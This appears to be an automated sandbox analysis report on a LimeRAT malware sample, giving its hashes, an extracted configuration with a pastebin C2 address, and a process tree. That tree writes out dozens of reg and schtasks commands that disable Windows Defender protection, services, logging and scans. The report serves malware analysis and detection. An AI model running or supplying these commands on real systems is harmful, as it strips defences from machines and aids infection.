Analysis
-
max time kernel
5s -
max time network
28s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
24-05-2022 13:43
Static task
static1
Behavioral task
behavioral1
Sample
8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac.exe
Resource
win7-20220414-en
General
-
Target
8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac.exe
-
Size
621KB
-
MD5
d41a2901bf1d0f3ba6b9498d6542c437
-
SHA1
cbbb9798a8bec4aa787cb4de24e07bcbe4a16983
-
SHA256
8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac
-
SHA512
231d6a471c8d41d7fbcaf4278af36bfb8495a57327210ef71d9be98a80ba7ec312dc92c1a75448df63a5362917bf35814e4e32c10ef2f3b33536b408d6f7e504
Malware Config
Extracted
limerat
1PPgmaXrzTj4ZXMTWNLh6VcmKRgU817rdK
-
aes_key
nyancat
-
antivm
false
-
c2_url
https://pastebin.com/raw/FvCAV8it
-
delay
3
-
download_payload
false
-
install
false
-
install_name
Wservices.exe
-
main_folder
Temp
-
pin_spread
true
-
sub_folder
\
-
usb_spread
true
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour. Note that the extracted config for this sample also sets usb_spread to true, so the drive enumeration may equally reflect removable-media propagation rather than encryption; confirm against the behavioural trace before classifying.
Processes
-
C:\Users\Admin\AppData\Local\Temp\8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac.exe"C:\Users\Admin\AppData\Local\Temp\8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac.exe"1⤵PID:3472
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe"2⤵PID:4912
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\76DA.tmp\76DB.tmp\76DC.bat C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe"3⤵PID:3204
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\opener.bat" "2⤵PID:232
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f1⤵PID:4224
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f1⤵PID:2172
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable1⤵PID:4516
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable1⤵PID:3772
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f1⤵PID:4712
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PayPal-Restore.exePayPal-Restore.exe -dC:\Users\Admin\AppData\Local\Temp1⤵PID:392
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe"2⤵PID:2952
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f1⤵PID:324
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f1⤵PID:2684
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f1⤵PID:2844
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f1⤵PID:736
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f1⤵PID:2584
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f1⤵PID:4164
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f1⤵PID:2352
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f1⤵PID:4392
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f1⤵PID:776
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable1⤵PID:4968
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable1⤵PID:1672
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable1⤵PID:5104
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f1⤵PID:2036
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f1⤵PID:1732
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f1⤵PID:1348
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f1⤵PID:552
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f1⤵PID:2164
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f1⤵PID:4012
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f1⤵PID:4140
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f1⤵PID:3592
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f1⤵PID:4260
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f1⤵PID:4276
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f1⤵PID:4884
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f1⤵PID:3404
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f1⤵PID:1268
Network
MITRE ATT&CK Enterprise v6
Downloads
-
Filesize
3KB
MD5 8760b15c6d12ecc70594fc8db876c68c
SHA1 b1d47a27bf45db9955f07c773a5a334e3b528a97
SHA256 9a3d9f84626d1443b0e1fc1afe22cc4045c20714b98838e94542991039cf8463
SHA512 0463204ebabf6465ba3be44b31dc235ba240f1899b41336655a3f361932b8225326d8ab7c53130d4ded9412193d5967f805221212b964d6a54492d0f2c331dee
-
Filesize
362KB
MD5 9f150fdb9779485a9b4af5875a48aaf7
SHA1 47e2d38e7c69a8e7f0e2993f3f8cb131483aa97f
SHA256 981c27f97402dab365ed009cff2ab23946424a8f0b1d31f080c1e8675434434a
SHA512 b4e94b127f75afb8fcc3d9555ecc608141b27e81755d3b9ffe0ef8632a7594806564f3e5a6dbbc2869b77c11d4570afc7b167440bcdf6f49934f2b4dbb4357df
-
Filesize
362KB
MD5 9f150fdb9779485a9b4af5875a48aaf7
SHA1 47e2d38e7c69a8e7f0e2993f3f8cb131483aa97f
SHA256 981c27f97402dab365ed009cff2ab23946424a8f0b1d31f080c1e8675434434a
SHA512 b4e94b127f75afb8fcc3d9555ecc608141b27e81755d3b9ffe0ef8632a7594806564f3e5a6dbbc2869b77c11d4570afc7b167440bcdf6f49934f2b4dbb4357df
-
Filesize
91KB
MD5 086890d750b486ec89ca6e7edd4f2d7c
SHA1 5f393c2eac56b2ebf0b985e9ac065c7c5e515a7b
SHA256 3d942d2daecb968356ee3886589b37cb8263bcd046fb092021a0c5631a0877d1
SHA512 33d99d82ebe57a3e59514a3caef72ff0e91890e8e45a3f1ae715fc7fe7134679f2e8fa178c8c1ef898460beace5408f4caf2955e325e93aa7ccd0b296c4289bf
-
Filesize
91KB
MD5 086890d750b486ec89ca6e7edd4f2d7c
SHA1 5f393c2eac56b2ebf0b985e9ac065c7c5e515a7b
SHA256 3d942d2daecb968356ee3886589b37cb8263bcd046fb092021a0c5631a0877d1
SHA512 33d99d82ebe57a3e59514a3caef72ff0e91890e8e45a3f1ae715fc7fe7134679f2e8fa178c8c1ef898460beace5408f4caf2955e325e93aa7ccd0b296c4289bf
-
Filesize
27B
MD5 76b34b8a915e15e32871820b24a60556
SHA1 aabf1487a5dc1880d5c8a6979666b215dc09a837
SHA256 ff8a34a62c2f4b7b5c058f67cfbbe5df9e74541f909a3b7f8c9fc8155b72d7a1
SHA512 2c0d801537d7576ab03b1eda1b0c60eb41525b4bd57b1a77a383b83dd49d20327b16162c7721c0e7b635734f6d96ffa4290dafc6350917ffa7114780d1716ffb
-
Filesize
82KB
MD5 54a1574cacf95b6c5c9c597d8d76de45
SHA1 4879d75f50d747a400c03ab9700e816ec0607fe6
SHA256 67f6ae56cdde6082b3cf05ba9a1a730dcf2e63eeb291507f1420b818d6e05eb1
SHA512 869b1ae4b939c4a2ea6528c9639de811bbd6048c686c4a2a0ae63443510b7575fa816890a13e83504afb5ce0322de228c1c6db3ab9c437a35a6fb8eabd5aeb2f
-
Filesize
82KB
MD5 54a1574cacf95b6c5c9c597d8d76de45
SHA1 4879d75f50d747a400c03ab9700e816ec0607fe6
SHA256 67f6ae56cdde6082b3cf05ba9a1a730dcf2e63eeb291507f1420b818d6e05eb1
SHA512 869b1ae4b939c4a2ea6528c9639de811bbd6048c686c4a2a0ae63443510b7575fa816890a13e83504afb5ce0322de228c1c6db3ab9c437a35a6fb8eabd5aeb2f